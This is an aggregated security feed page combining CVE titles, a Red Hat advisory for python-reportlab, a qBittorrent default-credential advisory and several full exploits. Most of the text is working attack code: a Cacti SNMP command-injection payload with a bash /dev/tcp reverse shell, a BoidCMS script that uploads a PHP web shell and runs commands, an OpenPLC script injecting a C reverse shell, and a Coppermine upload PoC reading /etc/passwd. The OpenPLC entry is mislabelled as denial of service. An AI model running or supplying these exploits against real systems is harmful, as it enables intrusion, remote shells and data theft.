Skype for Business Remote Code Execution Vulnerability

CVE-2023-36786

CVE-2023-36789

Microsoft Exchange Server Remote Code Execution Vulnerability

CVE-2023-36778

An update for python-reportlab is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2019-19450: A code injection vulnerability was found in python-reportlab that may allow an attacker to execute code while parsing a unichar element attribute. An application that uses python-reportlab to parse untrusted input files may be vulnerable and could allow remote code execution.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-10-10

Updated:

2023-10-10

**RHSA-2023:5616 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: python-reportlab security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for python-reportlab is now available for Red Hat Enterprise Linux 7.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Python-reportlab is a library used for generation of PDF documents.  

Security Fix(es):  

*   python-reportlab: code injection in paraparser.py allows code execution (CVE-2019-19450)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux Server 7 x86\_64
*   Red Hat Enterprise Linux Workstation 7 x86\_64
*   Red Hat Enterprise Linux Desktop 7 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 7 s390x
*   Red Hat Enterprise Linux for Power, big endian 7 ppc64
*   Red Hat Enterprise Linux for Power, little endian 7 ppc64le

**Fixes**

*   BZ - 2239920 - CVE-2019-19450 python-reportlab: code injection in paraparser.py allows code execution

**Red Hat Enterprise Linux Server 7**

SRPM

python-reportlab-2.5-11.el7\_9.src.rpm

SHA-256: a66893c9812abbcec1d53e7d7f884a930ecd5925162d87cae1a5cc2fe79b65e6

x86\_64

python-reportlab-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 9fdc6df678e6ba3edfa3a4b2b77ad478331f3f0fd8de799e9cefd292f0ea000a

python-reportlab-debuginfo-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 67be0dbdcd1063d01f674b9387b8255f25f1183678803386b2674263fad34f82

python-reportlab-debuginfo-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 67be0dbdcd1063d01f674b9387b8255f25f1183678803386b2674263fad34f82

python-reportlab-docs-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 5c3117219f624039408105ac4d4c5e34852b68e9c089dbfdb4a2777fb54b95c5

**Red Hat Enterprise Linux Workstation 7**

SRPM

python-reportlab-2.5-11.el7\_9.src.rpm

SHA-256: a66893c9812abbcec1d53e7d7f884a930ecd5925162d87cae1a5cc2fe79b65e6

x86\_64

python-reportlab-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 9fdc6df678e6ba3edfa3a4b2b77ad478331f3f0fd8de799e9cefd292f0ea000a

python-reportlab-debuginfo-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 67be0dbdcd1063d01f674b9387b8255f25f1183678803386b2674263fad34f82

python-reportlab-debuginfo-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 67be0dbdcd1063d01f674b9387b8255f25f1183678803386b2674263fad34f82

python-reportlab-docs-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 5c3117219f624039408105ac4d4c5e34852b68e9c089dbfdb4a2777fb54b95c5

**Red Hat Enterprise Linux Desktop 7**

SRPM

python-reportlab-2.5-11.el7\_9.src.rpm

SHA-256: a66893c9812abbcec1d53e7d7f884a930ecd5925162d87cae1a5cc2fe79b65e6

x86\_64

python-reportlab-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 9fdc6df678e6ba3edfa3a4b2b77ad478331f3f0fd8de799e9cefd292f0ea000a

python-reportlab-debuginfo-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 67be0dbdcd1063d01f674b9387b8255f25f1183678803386b2674263fad34f82

python-reportlab-debuginfo-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 67be0dbdcd1063d01f674b9387b8255f25f1183678803386b2674263fad34f82

python-reportlab-docs-2.5-11.el7\_9.x86\_64.rpm

SHA-256: 5c3117219f624039408105ac4d4c5e34852b68e9c089dbfdb4a2777fb54b95c5

**Red Hat Enterprise Linux for IBM z Systems 7**

SRPM

python-reportlab-2.5-11.el7\_9.src.rpm

SHA-256: a66893c9812abbcec1d53e7d7f884a930ecd5925162d87cae1a5cc2fe79b65e6

s390x

python-reportlab-2.5-11.el7\_9.s390x.rpm

SHA-256: e129eb2881223fbfd1f5e3d86bb4e47ac8d967536254dad9844d3e3a23269112

python-reportlab-debuginfo-2.5-11.el7\_9.s390x.rpm

SHA-256: 142df15126bd2fd1dbae12f1d01ee3baa53b19c10dc6d5f30bafdb04faae8483

python-reportlab-debuginfo-2.5-11.el7\_9.s390x.rpm

SHA-256: 142df15126bd2fd1dbae12f1d01ee3baa53b19c10dc6d5f30bafdb04faae8483

python-reportlab-docs-2.5-11.el7\_9.s390x.rpm

SHA-256: 04b56a255ddcc00ae43816fe38ca31fb98914ef839a6f587a85afb69c8ca420f

**Red Hat Enterprise Linux for Power, big endian 7**

SRPM

python-reportlab-2.5-11.el7\_9.src.rpm

SHA-256: a66893c9812abbcec1d53e7d7f884a930ecd5925162d87cae1a5cc2fe79b65e6

ppc64

python-reportlab-2.5-11.el7\_9.ppc64.rpm

SHA-256: 621ad5f16a9fc2e1b78fe0e92e43dc910716844e18d01ad0c1917e42104512ff

python-reportlab-debuginfo-2.5-11.el7\_9.ppc64.rpm

SHA-256: d1ccf731cdc28267f43dd624dd124151c6fd5f80de54551f5b367afa322bc308

python-reportlab-debuginfo-2.5-11.el7\_9.ppc64.rpm

SHA-256: d1ccf731cdc28267f43dd624dd124151c6fd5f80de54551f5b367afa322bc308

python-reportlab-docs-2.5-11.el7\_9.ppc64.rpm

SHA-256: 9b7d582bf0c198e9be42859d30cf73e4b75c1151012c725b2e4ea9dc0e0fea4f

**Red Hat Enterprise Linux for Power, little endian 7**

SRPM

python-reportlab-2.5-11.el7\_9.src.rpm

SHA-256: a66893c9812abbcec1d53e7d7f884a930ecd5925162d87cae1a5cc2fe79b65e6

ppc64le

python-reportlab-2.5-11.el7\_9.ppc64le.rpm

SHA-256: e8aa7a09129939b743eca9fef0c69b092ee963565d71d6a05000f370a21dea81

python-reportlab-debuginfo-2.5-11.el7\_9.ppc64le.rpm

SHA-256: 42858814d5f8cbf03e2e803392221779eb896efcf0b2557c47aae1caeeebaea0

python-reportlab-debuginfo-2.5-11.el7\_9.ppc64le.rpm

SHA-256: 42858814d5f8cbf03e2e803392221779eb896efcf0b2557c47aae1caeeebaea0

python-reportlab-docs-2.5-11.el7\_9.ppc64le.rpm

SHA-256: 2a69f20ab020019a199046f5068c9f31627689cdd849e44f71bdf4df79e76940

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:5616: Red Hat Security Advisory: python-reportlab security update

Cacti version 1.2.24 authenticated command injection exploit that uses SNMP options.

    # Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options# Date: 2023-07-03# Exploit Author: Antonio Francesco Sardella# Vendor Homepage: https://www.cacti.net/# Software Link: https://www.cacti.net/info/downloads# Version: Cacti 1.2.24# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container# CVE: CVE-2023-39362# Category: WebApps# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application# Vulnerability discovered and reported by: Antonio Francesco Sardella=======================================================================================Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)=======================================================================================-----------------Executive Summary-----------------In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.-------Exploit-------Prerequisites:    - The attacker is authenticated.    - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".    - A Device that supports SNMP can be used.    - Net-SNMP Graphs can be used.    - snmp module of PHP is not installed.Example of an exploit:    - Go to "Console" > "Create" > "New Device".    - Create a Device that supports SNMP version 1 or 2.    - Ensure that the Device has Graphs with one or more templates of:        - "Net-SNMP - Combined SCSI Disk Bytes"        - "Net-SNMP - Combined SCSI Disk I/O"        - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)    - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:        public\' ; touch /tmp/m3ssap0 ; \'    - Click the "Create" button.    - Check under /tmp the presence of the created file.To obtain a reverse shell, a payload like the following can be used.    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).----------Root Cause----------A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).----------References----------    - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp    - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html    - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti 1.2.24 Command Injection

BoidCMS versions 2.0.0 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/python3# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability# Date: 08/21/2023# Exploit Author: 1337kid# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://boidcms.github.io/BoidCMS.zip# Version: <= 2.0.0# Tested on: Ubuntu# CVE : CVE-2023-38836import requestsimport reimport argparseparser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')parser.add_argument("-u", "--url", help="website url")parser.add_argument("-l", "--user", help="admin username")parser.add_argument("-p", "--passwd", help="admin password")args = parser.parse_args()base_url=args.urluser=args.userpasswd=args.passwddef showhelp():  print(parser.print_help())  exit()if base_url == None: showhelp()elif user == None: showhelp()elif passwd == None: showhelp()with requests.Session() as s:  req=s.get(f'{base_url}/admin')  token=re.findall('[a-z0-9]{64}',req.text)  form_login_data={    "username":user,    "password":passwd,    "login":"Login",  }  form_login_data['token']=token  s.post(f'{base_url}/admin',data=form_login_data)  #=========== File upload to RCE  req=s.get(f'{base_url}/admin?page=media')  token=re.findall('[a-z0-9]{64}',req.text)  form_upld_data={    "token":token,    "upload":"Upload"  }  #==== php shell  php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']  with open('shell.php','w') as f:    f.writelines(php_code)  #====  file = {'file' : open('shell.php','rb')}  s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)  req=s.get(f'{base_url}/media/shell.php')  if req.status_code == '404':    print("Upload failed")    exit()  print(f'Shell uploaded to "{base_url}/media/shell.php"')  while 1:    cmd=input("cmd >> ")    if cmd=='exit': exit()    req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})    print(req.text)

BoidCMS 2.0.0 Shell Upload

OpenPLC WebServer version 3 suffers from a denial of service vulnerability.

    # Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")options, args = parser.parse_args()if not options.url:    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    print('[+] Specify an url target')    print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")    exit()host = options.urllogin = options.url + '/login' upload_program = options.url + '/programs'compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc'user = options.userpassword = options.passwrev_ip = options.riprev_port = options.rportx = requests.Session()def auth():    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    time.sleep(1)    print('[+] Checking if host '+host+' is Up...')    host_up = x.get(host)    try:        if host_up.status_code == 200:            print('[+] Host Up! ...')    except:        print('[+] This host seems to be down :( ')        sys.exit(0)    print('[+] Trying to authenticate with credentials '+user+':'+password+'')     time.sleep(1)       submit = {        'username': user,        'password': password    }    x.post(login, data=submit)    response = x.get(upload_program)                if len(response.text) > 30000 and response.status_code == 200:        print('[+] Login success!')        time.sleep(1)    else:        print('[x] Login failed :(')        sys.exit(0)  def injection():    print('[+] PLC program uploading... ')    upload_url = host + "/upload-program"     upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}    upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}     upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n  VAR\n    var_in : BOOL;\n    var_out : BOOL;\n  END_VAR\n\n  var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n  RESOURCE Res0 ON PLC\n    TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n    PROGRAM Inst0 WITH Main : prog0;\n  END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"    upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)    act_url = host + "/upload-program-action"    act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}    act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"    upload_act = x.post(act_url, headers=act_headers, data=act_data)    time.sleep(2)def connection():    print('[+] add device...')    inject_url = host + "/add-modbus-device"    # inject_dash = host + "/dashboard"    inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}    inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}    inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111                                # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n   \r\n    \r\n    \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n    int port = "+rev_port+";\r\n    struct sockaddr_in revsockaddr;\r\n\r\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n    revsockaddr.sin_family = AF_INET;       \r\n    revsockaddr.sin_port = htons(port);\r\n    revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n    connect(sockt, (struct sockaddr *) &revsockaddr, \r\n    sizeof(revsockaddr));\r\n    dup2(sockt, 0);\r\n    dup2(sockt, 1);\r\n    dup2(sockt, 2);\r\n\r\n    char * const argv[] = {\"/bin/sh\", NULL};\r\n    execve(\"/bin/sh\", argv, NULL);\r\n\r\n    return 0;  \r\n    \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"    inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)    time.sleep(3)    # comp = x.get(compile_program)    # time.sleep(6)    # x.get(inject_dash)    # time.sleep(3)    # print('[+] Spawning Reverse Shell...')    start = x.get(run_plc_server)    time.sleep(1)    if start.status_code == 200:        print('[+] Reverse connection receveid!')         sys.exit(0)    else:        print('[+] Failed to receive connection :(')        sys.exit(0)auth()injection()connection()

OpenPLC WebServer 3 Denial Of Service

All versions of the qBittorrent client through 4.5.5 use default credentials when the web user interface is enabled. The administrator is not forced to change the default credentials. As of 4.5.5, this issue has not been fixed. A remote attacker can use the default credentials to authenticate and execute arbitrary operating system commands using the "external program" feature in the web user interface. This was reportedly exploited in the wild in March 2023.


ProductsResourcesCommunityCompany

Go back

QBittorrent Web UI Default Credentials Leads to RCE

severity

critical

date

October 10, 2023

Affecting

*   All known versions of Qbittorrent. Unpatched as of v4.5.5.
    

CVE

CVE-2023-30801

CVE type

Use of Default Credentials

CVSS

9.8

CVSS V3 Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

*   Exploited in the wild

CVE-2023-30801: QBittorrent Web UI Default Credentials Leads to RCE | VulnCheck Advisories

Coppermine Gallery version 1.6.25 remote code execution exploit.

    Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25  Bugs:  RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT  �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--

Coppermine Gallery 1.6.25 Remote Code Execution

**According to the CVSS metric, the attack vector is local (AV:L). Why does the CVE title indicate that this is a remote code execution?**

The word **Remote** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally.

For example, when the score indicates that the **Attack Vector** is **Local** and **User Interaction** is **Required**, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.

Tag

#rce